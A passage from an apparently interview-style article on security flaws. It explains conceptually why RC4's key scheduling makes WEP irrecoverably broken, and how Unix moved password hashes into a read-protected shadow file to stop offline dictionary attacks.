in a way which does not cause the
problems seen in WEP. Nevertheless, the flaw exists in the
RC4 cryptosystem itself, or at least its key scheduling
algorithm (KSA) [7], rather than simply in WEP’s
implementation.
This statistical flaw allows an attacker to recover a WEP key
by capturing and analysing a few million wireless packets. So
there is no way to fix WEP without changing it for something
different. WEP is irrevocably broken.
Q. How about a system which was based on sound
cryptography but implemented dangerously?
A simple example of an implementation flaw – one which
was fixed by devising an alternative but compatible approach
– is the way early Unix systems stored their password file. All
users and programs need read access to this file, as it is
(amongst other things) the database which maps usernames,
such as ‘fp’, onto real names, such as ‘Ford Prefect’.
However, early Unix implementations also stored each user’s
hashed password in this file, so anyone could retrieve the
hashes and perform a dictionary attack against them off-line.
This meant that weak passwords could quickly be recovered
without leaving evidence of the dictionary attack on the
targeted system.
The backward-compatible solution, used in Linux to this
day, was to duplicate the password file, to replace the
hashes in the world-readable file with a dud entry, such as ‘x’,
and to read-protect the second copy of the file, called the
shadow file.
User programs worked exactly as before, except that they saw
dud information for the password hash, which they
Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24